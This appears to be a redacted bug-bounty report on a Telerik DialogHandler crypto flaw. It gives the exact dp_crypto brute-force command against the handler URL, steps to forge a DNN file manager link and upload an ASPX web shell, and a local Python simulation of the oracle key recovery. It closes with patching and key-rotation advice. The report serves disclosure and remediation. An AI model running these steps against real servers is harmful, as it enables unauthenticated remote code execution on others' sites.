CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 0.587 Medium (percentile 97.2%)
Summary:
https://█████████/ is hosting an unpatched version of the Telerik DialogHandler (Telerik.Web.UI.DialogHandler.aspx). A weakness in the handler's encryption lets an unauthenticated attacker brute force the machine key one character at a time. With that key the attacker can forge a link to the DNN file manager and upload arbitrary files, including ASPX, which gives a web shell and remote code execution.
Description:
Older versions of the Telerik Dialog Handler use a weak encryption scheme for the dialog parameters, and the handler's response reveals whether a supplied value decrypted correctly. That response works as an oracle: an attacker can brute force the machine key character by character, then use the recovered key to gain access to the DNN file manager. The file manager allows ASPX upload, which yields a web shell and RCE.
Step-by-step Reproduction Instructions
1. Request https://███/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx and note the dialog handler's error message; this message is the oracle the brute force relies on.
2. Download https://github.com/bao7uo/dp_crypto to make the brute force simple and run:
python dp_crypto.py -k https://███████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx 88 all 21
3. Wait for the script to finish; the recovered key is integrated into a link to the DNN file manager.
You can use this link to upload arbitrary files to DNN. I uploaded a PNG for proof, but ASPX works just as well here. I had to do a little trial and error on this one: it uses the ASCII character set, and figuring out a key length of 88 took a little doing, but going longer than the real key causes the base64 to start validating again from the beginning, so in a test with a key length of 128 I was able to see the key repeat at the 89th position.
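To make the mechanism behind the brute-force step concrete, the following is an added Python example; it is not code from the report, from dp_crypto or from Telerik. It is a local simulation that assumes two things, both simplifications of the real handler: the protected value is repeating-key XOR followed by base64, and the handler behaves as an accept/reject oracle on whether the decrypted value is well-formed base64 (in the real handler the difference shows up as the error message the report refers to). The class and function names, the 12-byte secret and the "constructed params" payload are all invented for the demonstration. It shows why the key falls one character at a time at linear rather than exponential cost, and reproduces the key-length repeat the report observed when probing past the real key length.

```python
import base64

# Base64 alphabet the simulated handler requires the decrypted payload to use.
B64_ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Candidate key characters: printable ASCII (the report says the key is ASCII).
PRINTABLE_ASCII = bytes(range(0x20, 0x7F))


def xor_encrypt(plaintext: bytes, key: bytes) -> str:
    """Repeating-key XOR, then base64: a model of the weak encryption scheme."""
    return base64.b64encode(
        bytes(p ^ key[i % len(key)] for i, p in enumerate(plaintext))
    ).decode()


def xor_decrypt(token: str, key: bytes) -> bytes:
    raw = base64.b64decode(token)
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(raw))


class SimulatedDialogHandler:
    """Local stand-in for the dialog handler (assumption: it 'accepts' a token
    only when the decrypted value consists solely of base64 characters, and
    answers with a different error otherwise). Nothing touches the network."""

    def __init__(self, secret_key: bytes):
        self._key = secret_key
        self.requests = 0

    def accepts(self, token: str) -> bool:
        self.requests += 1
        plain = xor_decrypt(token, self._key)
        return all(c in B64_ALPHABET for c in plain)


def recover_key(accepts, positions: int, charset: bytes = PRINTABLE_ASCII) -> bytes:
    """Recover `positions` bytes of the repeating key from the accept/reject oracle.

    At position i the bytes key[0:i] are already known. Each candidate c is
    tested with every base64 character p: the probe byte (p ^ c) decrypts to p
    only if key[i] == c. For a wrong c the XOR difference pushes at least one of
    the 64 probes outside the base64 alphabet (no non-zero XOR mask maps the
    alphabet onto itself), so only the true byte passes all 64. Earlier
    positions are filled so they decrypt to 'A' under the known prefix.
    Cost is at most len(charset) * 64 requests per position: linear in the
    key length, not exponential.
    """
    recovered = bytearray()
    for i in range(positions):
        prefix = bytes(ord("A") ^ recovered[j] for j in range(i))
        for cand in charset:
            if all(
                accepts(base64.b64encode(prefix + bytes([p ^ cand])).decode())
                for p in B64_ALPHABET
            ):
                recovered.append(cand)
                break
        else:
            raise RuntimeError(f"no candidate accepted at position {i}")
    return bytes(recovered)


def find_period(seq: bytes) -> int:
    """Smallest p with seq[i] == seq[i - p] for all i >= p. Guessing past the
    end of a repeating key just returns its first bytes again, so the period
    of the recovered stream is the key length (the repeat the report saw at
    position 89 when probing 128 positions of an 88-byte key)."""
    for p in range(1, len(seq)):
        if all(seq[i] == seq[i - p] for i in range(p, len(seq))):
            return p
    return len(seq)


def demo() -> dict:
    # Constructed 12-byte secret; the attacker-side code below never reads it.
    handler = SimulatedDialogHandler(b"n3Vq8#Lw2Zx!")
    # Probe more positions than the key could plausibly have, then find the repeat.
    stream = recover_key(handler.accepts, 30)
    length = find_period(stream)
    key = stream[:length]
    # With the key in hand the attacker can forge a value the handler accepts
    # (constructed payload; 18 bytes so its base64 needs no '=' padding).
    forged = xor_encrypt(base64.b64encode(b"constructed params"), key)
    return {
        "key": key,
        "key_length": length,
        "requests": handler.requests,
        "forged_accepted": handler.accepts(forged),
    }


if __name__ == "__main__":
    print(demo())
```

The request count in the result is the practical point: a 12-byte printable-ASCII key would need about 95^12 guesses without the oracle, but the oracle brings it down to a few thousand requests, and an 88-byte key only scales that linearly.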
Product, Version, and Configuration (If applicable)
Telerik <= 2017.1.118
Suggested Mitigation/Remediation Actions
Patch Telerik (upgrade past the affected versions) or switch to a different editor such as CKEditor. Because the key can be recovered by an unauthenticated attacker, treat it as compromised and rotate it after patching.
Critical: exploitation yields a web shell, defacement, etc. through arbitrary, unrestricted file upload.